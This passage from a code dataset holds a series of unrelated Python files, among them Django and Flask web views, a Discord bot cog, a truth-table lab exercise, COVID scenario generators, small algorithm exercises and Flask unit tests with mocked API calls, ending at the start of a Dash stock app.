'\n return HttpResponse(topic_response)\n\n\n@login_required\ndef ShowTopic(request, topic_url):\n topic = get_object_or_404(Topic, url=topic_url)\n questions = topic.topic_questions.all().order_by('-time')\n topic_followers = topic.followers.all()\n\n following = False\n if request.user in topic_followers:\n following = True\n follow_count = len(topic_followers)\n\n return render(request, 'topic/topic.html', {'topic': topic,\n 'questions': questions,\n 'following': following,\n 'follow_count': follow_count})\n\n\n@login_required\ndef FollowTopic(request, topic_url):\n topic = get_object_or_404(Topic, url=topic_url)\n topic.followers.add(request.user)\n return HttpResponse(topic.followers.count())\n\n\n@login_required\ndef UnfollowTopic(request, topic_url):\n topic = get_object_or_404(Topic, url=topic_url)\n topic.followers.remove(request.user)\n return HttpResponse(topic.followers.count())\n\n\n@login_required\ndef ShowAllTopics(request):\n topics = Topic.objects.annotate(\n follower_count=Count('followers')).order_by('-follower_count')\n return render(request, 'topic/browse_topics.html', {'topics': topics})\n","sub_path":"topic/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"341329557","text":"from lib.vision_api_utils import VisionAPIUtils\nfrom lib.isolate_rects import IsolateRects\nfrom lib.img_anno_manage import ImgAnnoManage\nimport cv2\nimport os\nimport tkinter\nimport tkinter.filedialog\n\niam = ImgAnnoManage()\niso = IsolateRects(debug=False, init_show=False)\nvau = VisionAPIUtils(debug=False)\n\n\ndef proc(image_path):\n if os.path.splitext(image_path)[1].lower() not in [\".jpg\", \".png\"]:\n print(\"\\nno correct file type.\")\n\n else:\n print(\"\\nfile name: \", image_path)\n print(\"processing ...\")\n\n img = iam.load_image(image_path)\n if img is None:\n print(\"can not read image file{}\".format(image_path))\n return\n\n ###\n splits = iso.isolate(img=img)\n\n if splits is not None:\n for i in range(len(splits)):\n sp = splits[i]\n print(\"== {}\".format(i))\n\n ###\n value = vau.get_values(split=sp, sp_id=i)\n\n if 'current' in value.keys():\n print(\"current: value: {}, level: {}\".format(value['current']['value'], value['current']['level']))\n if 'potential' in value.keys():\n print(\"potential: value: {}, level: {}\".format(value['potential']['value'], value['potential']['level']))\n\n cv2.imshow(\"img\", img)\n cv2.waitKey(0)\n\n\ndef main():\n while True:\n tk = tkinter.Tk()\n tk.withdraw()\n select_file = (tkinter.filedialog.askopenfile(initialdir='.', title='select a image file'))\n if select_file is not None:\n image_path = select_file.name\n proc(image_path=image_path)\n tk.update()\n tk.destroy()\n\n\ndef test(folder):\n fns = [fn for fn in os.listdir(folder) if os.path.splitext(fn)[1].lower() in [\".jpg\", \".png\"]]\n fns.sort()\n\n find_flag = False\n for fn in fns:\n if fn == \"15194_101995033431_EPCGRAPH_01_0000.jpg\":\n find_flag = True\n\n if not find_flag:\n continue\n\n path = os.path.join\n proc(image_path=os.path.join(folder, fn))\n\n\nif __name__ == '__main__':\n main()\n # test(\"./data/images\")\n # proc(image_path=\"./data/images/99943.jpg\")\n","sub_path":"endpoints.py","file_name":"endpoints.py","file_ext":"py","file_size_in_byte":2200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"168838800","text":"from app import db\nfrom app.models import Post\nfrom 
app.posts.forms import PostForm\n\nfrom flask import (abort, Blueprint, flash, redirect, render_template,\n request, url_for)\n\nfrom flask_login import current_user, login_required\n\n# -----------------------------------------------------------------------------\n# Init posts\n\nposts = Blueprint('posts', __name__)\n\n# -----------------------------------------------------------------------------\n# Post : Delete\n\n@posts.route(\"/post//delete\", \n methods = ['POST'])\n\n@login_required\n\ndef delete_post(post_id):\n post = Post.query.get_or_404(post_id)\n\n if post.author != current_user:\n abort(403)\n\n db.session.delete(post)\n db.session.commit()\n\n flash('Your post has been deleted !', \n 'success')\n\n return redirect(url_for('main.home'))\n\n# -----------------------------------------------------------------------------\n# Post : Edit\n\n@posts.route(\"/post//update\", \n methods = ['GET', 'POST'])\n\n@login_required\n\ndef update_post(post_id):\n post = Post.query.get_or_404(post_id)\n\n if post.author != current_user:\n abort(403)\n\n form = PostForm()\n\n if form.validate_on_submit():\n post.title = form.title.data\n post.content = form.content.data\n\n db.session.commit()\n\n flash('Your post has been updated!', \n 'success')\n\n return redirect(url_for('posts.post', post_id = post.id))\n\n elif request.method == 'GET':\n form.title.data = post.title\n form.content.data = post.content\n\n return render_template('new_post.html', \n title = 'Update Post',\n legend = 'Update Post',\n form = form )\n\n# -----------------------------------------------------------------------------\n# Post : Get ID\n\n@posts.route(\"/post/\")\n\ndef post(post_id):\n post = Post.query.get_or_404(post_id)\n\n return render_template('post.html',\n title = post.title,\n post = post)\n\n# -----------------------------------------------------------------------------\n# Post : New\n\n@posts.route(\"/post/new\",\n methods = ['GET', 'POST'])\n\n@login_required\n\ndef new_post():\n form = PostForm()\n\n if form.validate_on_submit():\n post = Post(title = form.title.data,\n content = form.content.data,\n author = current_user)\n\n db.session.add(post)\n db.session.commit()\n\n flash('Your post has been created !',\n 'success')\n \n return redirect(url_for('main.home'))\n\n return render_template('new_post.html', \n title = 'New Post',\n legend = 'New Post',\n form = form)","sub_path":"Flask App/Blog/app/posts/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"196726886","text":"from discodb import DiscoDB\nfrom bitdeli.model import model\n\nMAX_LEN = 64\n\n@model\ndef build(profiles):\n keys = set()\n for profile in profiles:\n uid = profile.uid\n if not uid:\n continue\n fields = set()\n for tstamp, group, ip, event in profile['events']:\n e = 'e:%s' % event.pop('$event_name').encode('utf-8')\n keys.add(e)\n fields.add(e)\n for prop_name, prop_value in event.iteritems():\n p = prop_name.encode('utf-8')\n keys.add('p:%s' % p)\n fields.add('%s:%s' % (p, str(prop_value)[:MAX_LEN].encode('utf-8')))\n for field in fields:\n yield field, uid\n for key in keys:\n yield ' ', key\n","sub_path":"jsapi/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"428057255","text":"import discord\nfrom discord.ext import commands\n\nimport random\n\n\nclass Random:\n 
\"\"\"Commands which are based on RNG's.\"\"\"\n\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name='choose', aliases=['select'])\n async def _choose(self, ctx, *args):\n \"\"\"Make Myst choose between two or more things.\"\"\"\n\n choice = random.choice(args)\n await ctx.send(f'**`{choice}`**')\n\n @commands.command(name='roll')\n async def roll_dice(self, ctx, first: int, second: int):\n \"\"\"Returns a number between two selected numbers.\"\"\"\n\n rolled = random.randint(first, second)\n await ctx.send(f'{ctx.author.mention} rolled: **`{rolled}`**')\n\n\ndef setup(bot):\n bot.add_cog(Random(bot))\n","sub_path":"cogs/random.py","file_name":"random.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"95768796","text":"# -*- coding: utf-8 -*-\ndef custom_bin(num, sz = 5):\n return bin(num)[2:].rjust(sz, '0')\n\ndef dnf(bits):\n x1, x2, x3, x4, x5 = tuple(map(bool, map(int, custom_bin(bits))))\n z1 = not x1 and not x3\n z2 = x1 and x3\n z3 = x1 and not x2\n z4 = not x3 and x4\n z5 = x2 and x3\n z6 = not x4 and not x5\n u1 = z3 and z4\n u2 = z1 and not x4\n u3 = z1 and x2\n u4 = z2 and not x4\n u5 = z2 and x2\n u6 = z5 and z6\n u7 = z1 and not x5\n u8 = z2 and not x5\n v3 = u1 or u2\n v4 = u3 or u4\n v5 = u5 or u6\n v6 = u7 or u8\n v1 = v3 or v4\n v2 = v5 or v6\n f = v1 or v2\n return int(f)\n\ndef knf(bits):\n x1, x2, x3, x4, x5 = tuple(map(bool, map(int, custom_bin(bits))))\n z1 = x1 or not x3\n z3 = not x1 or x3\n z4 = not x4 or not x5\n z2 = x2 or z4\n u1 = x1 or z2\n u2 = not x3 or z2\n u3 = x4 or z3\n u4 = not x4 or z1\n u5 = not x2 or z3\n u6 = not x5 or z1\n u7 = x2 or z1\n v5 = u1 and u2\n v4 = u5 and u6\n v3 = u3 and v5\n v2 = u7 and v4\n v1 = u4 and v3\n f = v1 and v2\n return int(f)\n\nvar_count = 5\nbit_set = 0\ntable = {}\nprint(\"Таблица истинности исходной функции:\")\nfor _ in range(2**var_count):\n str_bs = custom_bin(bit_set) # Вектор переменных x1 - x5\n table[bit_set] = int(\n eval(\n '-2 <= ({0} - {1}) and ({0} - {1}) < 3'.format( # Условие -2 <=(x1x20-x3x4x5)<3\n int(str_bs[:2] + '0', 2), # Первое выражение x1x20\n int(str_bs[2:], 2) # Второе выражение x3x4x5\n )\n )\n )\n print(\n '| ' + ' | '.join(list(str_bs + str(table[bit_set]))) + ' |'\n )\n bit_set += 1\n\nprint(\"Таблица истинности схемы по ДНФ:\")\ntable_dnf = {}\nbit_set = 0\nfor _ in range(2**var_count):\n table_dnf[bit_set] = dnf(bit_set)\n print(\n '| ' + ' | '.join(list(custom_bin(bit_set) + str(table_dnf[bit_set]))) + ' |'\n )\n bit_set += 1\n \nprint(\"Таблица истинности схемы по КНФ:\")\ntable_knf = {}\nbit_set = 0\nfor _ in range(2**var_count):\n table_knf[bit_set] = knf(bit_set)\n print(\n '| ' + ' | '.join(list(custom_bin(bit_set) + str(table_knf[bit_set]))) + ' |'\n )\n bit_set += 1\n\nprint(\"Исходная и днф совпадают: \", table == table_dnf)\nprint(\"Исходная и кнф совпадают: \", table == table_knf)\n","sub_path":"TCA/lab1/report/source/lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"569253924","text":"#python\n\n# resize_selected_locators.py\n#\n# Version 1.2 - By Cristobal Vila, 2013 - With the help of other members from Luxology Forums :-)\n# Special thanks to MonkeybrotherJR\n#\n# To give a custom size to all channels in a selected Locators,\n# no matter the kind of Locators and if there are some channels greyed\n#\n# www.etereaestudios.com\n\nimport 
lx\nimport sys\n\ntry:\n\n    scene_svc = lx.Service(\"sceneservice\")\n\n    # Define my argument:\n    mysize = float(lx.args()[0])\n\n    # get selected layers\n    selected_layers = lx.evalN(\"query sceneservice selection ? all\")\n\n    # drop selection so that we can work on one item at a time\n    lx.eval(\"select.drop item\")\n\n    # create empty list to put locators in\n    locators = []\n\n    for item in selected_layers:\n\n        # select layer\n        scene_svc.select(\"item\",str(item))\n        lx.eval('select.item {%s} set' % item)\n\n        # get item type\n        itemType = scene_svc.query(\"item.type\")\n\n        if itemType == 'locator':\n\n            locators.append(item)\n\n            # Ask if our locator has a default or custom shape:\n            lx.eval('item.channel locator$drawShape ?')\n\n            # This gives a result (default / custom)\n            # Save that result into a variable:\n            locatorShape = lx.eval1('item.channel locator$drawShape ?')\n\n            if locatorShape == 'default':\n                # Change size for standard default locator:\n                lx.eval(\"item.channel locator$size \" +str(mysize))\n\n            elif locatorShape == 'custom':\n                # Ask which is actual shape:\n                lx.eval(\"item.channel locator$isShape ?\")\n\n                # This gives a result (box, pyramid, plane…)\n                # Save that result into a variable:\n                originalShape = lx.eval(\"item.channel locator$isShape ?\")\n\n                # Change size for standard default locator:\n                lx.eval(\"item.channel locator$size \" +str(mysize))\n\n                # Set shape to Box:\n                lx.eval(\"item.channel locator$isShape box\")\n\n                # Change properties for XYZ channels, since now all are available:\n                lx.eval(\"item.channel locator$isSize.X \" +str(mysize))\n                lx.eval(\"item.channel locator$isSize.Y \" +str(mysize))\n                lx.eval(\"item.channel locator$isSize.Z \" +str(mysize))\n\n                # Set shape to Circle:\n                lx.eval(\"item.channel locator$isShape circle\")\n\n                # Change properties for Radius, since now this is available:\n                lx.eval(\"item.channel locator$isRadius \" +str(mysize * 0.5))\n\n                # Change shape back to the one saved inside our first variable:\n                lx.eval(\"item.channel locator$isShape %s\" % originalShape)\n\n    # re-select the user selected layers\n    for item in selected_layers:\n        lx.eval('select.item {%s} add' % item)\n\nexcept:\n    lx.out('Exception \"%s\" on line: %d' % (sys.exc_value, sys.exc_traceback.tb_lineno))","sub_path":"eterea_quickLocators/scripts/resize_selected_locators.py","file_name":"resize_selected_locators.py","file_ext":"py","file_size_in_byte":2972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"222686349","text":"from django.conf.urls import patterns, url\nfrom . 
import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^index$', views.index, name='index'),\n url(r'^anliall$', views.anliall, name='anliall'),\n url(r'^oushi$', views.oushi, name='oushi'),\n url(r'^katong$', views.katong, name='katong'),\n url(r'^zhongshi$', views.zhongshi, name='zhongshi'),\n url(r'^xiandai$', views.xiandai, name='xiandai'),\n url(r'^jianyue$', views.jianyue, name='jianyue'),\n url(r'^about$', views.about, name='about'),\n url(r'^about1$', views.about1, name='about1'),\n url(r'^about2$', views.about2, name='about2'),\n url(r'^about3$', views.about3, name='about3'),\n url(r'^about4$', views.about4, name='about4'),\n url(r'^news$', views.news, name='news'),\n url(r'^news1$', views.news1, name='news1'),\n url(r'^news2$', views.news2, name='news2'),\n url(r'^news3$', views.news3, name='news3'),\n url(r'^jiameng$', views.jiameng, name='jiameng'),\n url(r'^cont$', views.cont, name='cont'),\n url(r'^VR$', views.VR, name='VR'),\n url(r'^VRoushi$', views.VRoushi, name='VRoushi'),\n url(r'^VRbeiou$', views.VRbeiou, name='VRbeiou'),\n url(r'^VRzhongshi$', views.VRzhongshi, name='VRzhongshi'),\n url(r'^VRxiandai$', views.VRxiandai, name='VRxiandai'),\n url(r'^VRmeishi$', views.VRmeishi, name='VRmeishi'),\n url(r'^VRbieshu$', views.VRbieshu, name='VRbieshu'),\n url(r'^VRdizhonghai$', views.VRdizhonghai, name='VRdizhonghai'),\n]","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"62931670","text":"\"\"\"\nMerge List Of Number Into Ranges\n\nThis problem was recently asked by Facebook:\n\nGiven a sorted list of numbers, return a list of strings that represent all of the consecutive numbers.\n\nExample:\nInput: [0, 1, 2, 5, 7, 8, 9, 9, 10, 11, 15]\nOutput: ['0->2', '5->5', '7->11', '15->15']\nAssume that all numbers will be greater than or equal to 0, and each element can repeat.\n\n\n\"\"\"\n\ndef solution(numbers):\n if not numbers:\n return []\n \n ranges = []\n low, high = numbers[0], numbers[0]\n\n for number in numbers:\n if high + 1 < number:\n ranges.append(f\"{low} -> {high}\")\n low = number\n high = number\n ranges.append(f\"{low} -> {high}\")\n return ranges\n\n\nif __name__ == \"__main__\":\n print(solution([0, 1, 2, 5, 7, 8, 9, 9, 10, 11, 15]))","sub_path":"python/daily_interview_pro/202003/20200331.py","file_name":"20200331.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"284262940","text":"\"\"\"\nThe scenario parameter files of the \"philippines\" application \ncan be replicated for the regional philippines applications.\n\nTo do this, run this script.\n\"\"\"\nimport os\nfrom copy import copy\nfrom time import sleep\n\nimport yaml\n\nfrom autumn.settings import Region\n\nSCENARIO_START_TIME = 573 # 26 Jul 2021\n#\n# WORKFORCE_PROP = []\n# BACK_TO_NORMAL_FRACTIONS = []\n# MHS_REDUCTION_FRACTIONS = []\n# SCHOOL_REOPEN_FRACTIONS = []\n\nBASELINE_TARGET_VACC_COVERAGE = .3\nVACCINE_SCENARIOS = {\"extra_coverage_from_baseline_target\": [0., .4]}\nINCREASED_MOBILITY = [0., .3, .5]\nINCREASED_TESTING = [0., .5]\n\n\ndef clear_all_scenarios(region):\n dir_name = region.replace(\"-\", \"_\")\n file_path = f\"../{dir_name}/params/\"\n\n scenario_files = os.listdir(file_path)\n for filename in scenario_files:\n if filename.startswith(\"scenario-\"):\n os.remove(f\"../{dir_name}/params/{filename}\")\n\n\ndef 
get_greater_scenario_number(region):\n dir_name = region.replace(\"-\", \"_\")\n file_path = f\"../{dir_name}/params/\"\n\n scenario_files = os.listdir(file_path)\n sc_numbers = [\n float(filename.split(\"-\")[1].split(\".yml\")[0])\n for filename in scenario_files\n if filename.startswith(\"scenario-\")\n ]\n\n return int(max(sc_numbers))\n\n\ndef write_all_phl_scenarios(scenario_start_time=SCENARIO_START_TIME):\n clear_all_scenarios(\"philippines\")\n sleep(1.0)\n\n sc_index = 0\n all_scenarios_dict = {}\n\n # # Back to normal in workplaces and other locations\n # for fraction in BACK_TO_NORMAL_FRACTIONS:\n # sc_index += 1\n # all_scenarios_dict[sc_index] = make_back_to_normal_sc_dict(fraction, scenario_start_time)\n #\n # # MHS reduction\n # for fraction in MHS_REDUCTION_FRACTIONS:\n # sc_index += 1\n # all_scenarios_dict[sc_index] = make_mhs_reduction_sc_dict(fraction, scenario_start_time)\n #\n # # School reopening\n # for fraction in SCHOOL_REOPEN_FRACTIONS:\n # sc_index += 1\n # all_scenarios_dict[sc_index] = make_school_reopen_sc_dict(fraction, scenario_start_time)\n\n # Vaccination combined with mobility changes\n for extra_coverage in VACCINE_SCENARIOS[\"extra_coverage_from_baseline_target\"]:\n for increased_mobility in INCREASED_MOBILITY:\n for increased_testing in INCREASED_TESTING:\n if extra_coverage == 0. and increased_mobility == 0. and increased_testing == 0.:\n continue # this is the baseline scenario\n sc_index += 1\n all_scenarios_dict[sc_index] = make_vaccination_and_increased_mobility_and_increased_testing_sc_dict(\n extra_coverage, increased_mobility, increased_testing, scenario_start_time\n )\n\n # dump scenario files\n for sc_i, scenario_dict in all_scenarios_dict.items():\n print(f\"Scenario {sc_i}: {scenario_dict['description']}\")\n\n file_path = f\"params/scenario-{sc_i}.yml\"\n with open(file_path, \"w\") as f:\n yaml.dump(scenario_dict, f)\n\n\ndef initialise_sc_dict(scenario_start_time):\n return {\n \"time\": {\"start\": scenario_start_time},\n }\n\n\ndef make_back_to_normal_sc_dict(fraction, scenario_start_time):\n sc_dict = initialise_sc_dict(scenario_start_time)\n perc = int(100 * fraction)\n sc_dict[\"description\"] = f\"{perc}% return to normal (work and other locations)\"\n\n sc_dict[\"mobility\"] = {\n \"mixing\": {\n \"work\": {\n \"append\": True,\n \"times\": [scenario_start_time],\n \"values\": [[\"close_gap_to_1\", fraction]],\n },\n \"other_locations\": {\n \"append\": True,\n \"times\": [scenario_start_time],\n \"values\": [[\"close_gap_to_1\", fraction]],\n },\n }\n }\n\n return sc_dict\n\n\ndef make_mhs_reduction_sc_dict(fraction, scenario_start_time):\n sc_dict = initialise_sc_dict(scenario_start_time)\n perc = int(100 * fraction)\n sc_dict[\"description\"] = f\"Reduction in MHS by {perc}%\"\n\n sc_dict[\"mobility\"] = {\n \"microdistancing\": {\n \"behaviour\": {\n \"parameters\": {\n \"times\": [scenario_start_time - 1, scenario_start_time],\n \"values\": [1.0, 1.0 - fraction],\n }\n }\n }\n }\n\n return sc_dict\n\n\ndef make_school_reopen_sc_dict(fraction, scenario_start_time):\n sc_dict = initialise_sc_dict(scenario_start_time)\n perc = int(100 * fraction)\n sc_dict[\"description\"] = f\"{perc}% of schools reopen\"\n\n sc_dict[\"mobility\"] = {\n \"mixing\": {\n \"school\": {\n \"append\": False,\n \"times\": [scenario_start_time - 1, scenario_start_time],\n \"values\": [0.0, fraction],\n },\n }\n }\n\n return sc_dict\n\n\ndef make_vaccination_and_workforce_sc_dict(coverage, prop_workforce, scenario_start_time):\n sc_dict = 
initialise_sc_dict(scenario_start_time)\n perc_coverage = int(100 * coverage)\n perc_workforce = int(100 * prop_workforce)\n\n sc_dict[\n \"description\"\n ] = f\"{perc_coverage}% vaccine coverage / {perc_workforce}% onsite workers\"\n\n sc_dict[\"vaccination\"] = {\n \"roll_out_components\": [\n {\n \"supply_period_coverage\": {\n \"coverage\": coverage,\n \"start_time\": scenario_start_time,\n \"end_time\": 731, # end of year 2021\n }\n }\n ],\n }\n\n sc_dict[\"mobility\"] = {\n \"mixing\": {\n \"work\": {\n \"append\": True,\n \"times\": [scenario_start_time - 1, scenario_start_time + 1],\n \"values\": [[\"repeat_prev\"], prop_workforce],\n },\n }\n }\n\n return sc_dict\n\n\ndef make_vaccination_and_increased_mobility_and_increased_testing_sc_dict(\n extra_coverage, increased_mobility, increased_testing, scenario_start_time\n):\n sc_dict = initialise_sc_dict(scenario_start_time)\n perc_coverage = int(100 * (extra_coverage + BASELINE_TARGET_VACC_COVERAGE))\n perc_increase_mobility = int(100 * increased_mobility)\n perc_increase_testing = int(100 * increased_testing)\n\n mobility_description = f\"{perc_increase_mobility}% increased mobility\" if perc_increase_mobility > 0. else \"baseline mobility\"\n testing_description = f\"{perc_increase_testing}% increased testing\" if perc_increase_testing > 0. else \"baseline testing\"\n\n sc_dict[\n \"description\"\n ] = f\"{perc_coverage}% vaccine coverage / {mobility_description} / {testing_description}\"\n\n if extra_coverage > 0.:\n sc_dict[\"vaccination\"] = {\n \"roll_out_components\": [\n {\n \"supply_period_coverage\": {\n \"coverage\": extra_coverage + BASELINE_TARGET_VACC_COVERAGE,\n \"start_time\": scenario_start_time,\n \"end_time\": 731, # end of year 2021\n }\n }\n ],\n }\n if increased_mobility > 0.:\n sc_dict[\"mobility\"] = {\n \"mixing\": {\n \"work\": {\n \"append\": True,\n \"times\": [scenario_start_time - 1, scenario_start_time + 1],\n \"values\": [[\"repeat_prev\"], [\"scale_prev\", 1. + increased_mobility]],\n },\n \"other_locations\": {\n \"append\": True,\n \"times\": [scenario_start_time - 1, scenario_start_time + 1],\n \"values\": [[\"repeat_prev\"], [\"scale_prev\", 1. + increased_mobility]],\n },\n }\n }\n\n if increased_testing > 0.:\n sc_dict['testing_to_detection'] = {\n 'test_multiplier': {\n 'times': [scenario_start_time - 1, scenario_start_time + 1],\n 'values': [1., 1. 
+ increased_testing]\n }\n }\n\n return sc_dict\n\n\ndef read_all_phl_scenarios():\n \"\"\"\n Read all the scenarios defined for the \"philippines\" application\n :return: a dictionary containing all the scenario parameters\n \"\"\"\n scenario_param_dicts = {}\n\n param_files = os.listdir(\"params/\")\n for filename in param_files:\n if filename.startswith(\"scenario-\"):\n file_path = f\"params/{filename}\"\n with open(file_path) as file:\n sc_dict = yaml.load(file)\n\n scenario_param_dicts[filename] = sc_dict\n\n return scenario_param_dicts\n\n\ndef copy_scenarios_to_phl_regions():\n \"\"\"\n Replicate all scenarios defined for the \"philippines\" application to the three regional applications\n :return:\n \"\"\"\n scenario_param_dicts = read_all_phl_scenarios()\n\n for region in Region.PHILIPPINES_REGIONS:\n if region == \"philippines\":\n continue\n dir_name = region.replace(\"-\", \"_\")\n\n clear_all_scenarios(region)\n sleep(1.0)\n\n for filename, sc_dict in scenario_param_dicts.items():\n region_scenario_param = copy(sc_dict)\n file_path = f\"../{dir_name}/params/{filename}\"\n with open(file_path, \"w\") as f:\n yaml.dump(region_scenario_param, f)\n\n\nif __name__ == \"__main__\":\n\n # Update scenarios for the Philippines app\n write_all_phl_scenarios()\n\n # Copy scenarios from philippines to sub-regions\n copy_scenarios_to_phl_regions()\n","sub_path":"autumn/projects/covid_19/philippines/philippines/phl_utils.py","file_name":"phl_utils.py","file_ext":"py","file_size_in_byte":9367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"252845061","text":"# Binary Search with user function and Dynamic input\n\n#Defining the function binary_Search\ndef binary_Search(a,s):\n high = len(a)\n low = 0\n mid = (low+high)//2\n a.sort()\n if s not in a:\n print('Element not found in the array!!')\n elif a[mid] == s:\n print(f'Element found at index {mid}')\n elif s < a[mid]:\n for i in range(low,mid):\n if a[i] == s:\n print(f'Element found at index {i}')\n break\n else:\n for i in range (mid, high):\n if a[i] == s:\n print(f'Element found at index {i}')\n break\n\n\n\n#Taking the input from the user :\n\nn = int(input('Enter the size of the array : '))\narr = []\nprint(\"Enter the elements of the array\")\nfor i in range(n):\n x = int(input())\n arr.append(x)\n\n#Asking the user for the element to search\nse = int(input('Enter the element you want to search'))\n\n#calling the function\nbinary_Search(arr,se)\n","sub_path":"Binary Search with User defined function and Dynamic input.py","file_name":"Binary Search with User defined function and Dynamic input.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"594318274","text":"#!/usr/bin/env python\n\nimport unittest\nfrom mock import patch\nfrom mock import MagicMock\n\nfrom flask import request\nfrom StringIO import StringIO\nfrom src.app import espaweb\nfrom src.mocks import app as mock_app\nfrom src.utils import User\n\n\nclass ApplicationTestCase(unittest.TestCase):\n\n def setUp(self):\n self.app = espaweb.test_client()\n self.app.testing = True\n self.default_sceneid = 'LE70270292003144EDC00'\n self.form_order = mock_app.form_order\n\n user_parms = {'email': 'foo@gmail.com',\n 'username': 'foo',\n 'wurd': 'bar',\n 'roles': ['staff']}\n\n self.user = User(**user_parms)\n\n with espaweb.test_client() as c:\n with c.session_transaction() as sess:\n sess['logged_in'] = True\n sess['user'] = 
self.user\n\n self.client = c\n\n def tearDown(self):\n pass\n\n def test_login_get(self):\n result = self.app.get('/login')\n self.assertEqual(result.status_code, 200)\n self.assertTrue('Ordering Interface ' in result.data)\n\n @patch('src.app.api_get', mock_app.api_get_user)\n @patch('src.app.update_status_details', mock_app.update_status_details_true)\n def test_login_post_success(self):\n data_dict = {'username': self.user.username, 'password': self.user.wurd}\n result = self.app.post('/login', data=data_dict)\n # successful login redirects to /index\n self.assertTrue(\">/index/\" in result.data)\n self.assertEqual(result.status_code, 302)\n\n @patch('src.app.api_get', mock_app.api_get_user_fail)\n def test_login_post_fail(self):\n data_dict = {'username': self.user.username, 'password': self.user.wurd}\n result = self.client.post('/login', data=data_dict)\n self.assertEqual(result.status_code, 401)\n\n def test_get_logout(self):\n result = self.client.get('/logout')\n # results in a redirect to the login page\n self.assertTrue(\">/login\" in result.data)\n self.assertEqual(result.status_code, 302)\n\n def test_get_index(self):\n result = self.client.get('/index/')\n self.assertTrue(\"ESPA - LSRD\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n def test_get_new_order(self):\n result = self.client.get(\"/ordering/new/\")\n self.assertTrue(\"
<h4>New Bulk Order</h4>
\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_up', mock_app.api_post_order)\n def test_submit_order_post_success(self):\n data = self.form_order\n data['input_product_list'] = (StringIO(self.default_sceneid), 'in.txt')\n result = self.client.post(\"/ordering/submit/\",\n content_type='multipart/form-data',\n data=data)\n self.assertTrue(\"/ordering/order-status/bob@google.com-03072016-085432/\" in result.data)\n self.assertEqual(result.status_code, 302)\n\n @patch('src.app.api_get', mock_app.api_get_list_orders)\n def test_get_list_orders(self):\n result = self.client.get(\"/ordering/status/\")\n self.assertTrue(\"ESPA - ESPA Reports \" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_get', mock_app.api_get_order_status)\n def test_get_view_order(self):\n result = self.client.get(\"/ordering/order-status/bob@google.com-12345-9876/\")\n self.assertTrue(\"Details for: bob@google.com-12345-9876\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_get', mock_app.api_get_reports)\n def test_get_list_reports(self):\n result = self.client.get(\"/reports/\")\n self.assertTrue(\"ESPA - ESPA Reports\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_get', mock_app.api_get_show_report)\n def test_get_show_report(self):\n result = self.client.get(\"/reports/orders_counts/\")\n self.assertTrue(\"<h4>orders_counts Report</h4>\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_get', mock_app.api_get_stats_all)\n def test_get_console(self):\n result = self.client.get(\"/console\")\n self.assertTrue(\"<h4>ESPA Console</h4>\" in result.data)\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.update_status_details', mock_app.update_status_details_true)\n @patch('src.app.api_up', mock_app.api_post_status)\n def test_post_statusmsg(self):\n data = {'display_system_message': 'on', 'system_message_title': 'foo',\n 'system_message_body': 'bar'}\n result = self.client.post(\"/console/statusmsg\", data=data)\n self.assertTrue(\"<p>You should be redirected automatically to target URL: \"\n \"<a href=\\\"/index/\\\">/index/</a>\" in result.data)\n self.assertEqual(result.status_code, 302)\n\n @patch('src.app.api_get', mock_app.api_get_system_config)\n def test_get_console_config(self):\n result = self.client.get(\"/console/config\")\n self.assertEqual(result.status_code, 200)\n\n @patch('src.app.api_get', mock_app.api_get_rss_feed)\n def test_get_rss_feed(self):\n result = self.client.get(\"/ordering/status/bob@gmail.com/rss/\")\n self.assertEquals(result.status_code, 200)\n\n\n\n\n\n\n\n\n\n","sub_path":"test/test_web_transport.py","file_name":"test_web_transport.py","file_ext":"py","file_size_in_byte":5409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"548793817","text":"from datetime import datetime, timedelta\r\n\r\nimport dash\r\nimport dash_bootstrap_components as dbc\r\nimport dash_core_components as dcc\r\nimport dash_html_components as html\r\nimport numpy as np\r\nimport pandas as pd\r\nimport plotly.graph_objs as go\r\nimport settings\r\nimport stock_info\r\nfrom dash.dependencies import Input, Output\r\nfrom future_value import get_future_value\r\nfrom pandas_datareader import data as web\r\nfrom stock_evaluation import get_stock_evaluation\r\nfrom stock_list import combine_stock_list\r\n\r\nBULL_LOGO = \"static/img/bull.png\"\r\nBEAR_LOGO = 
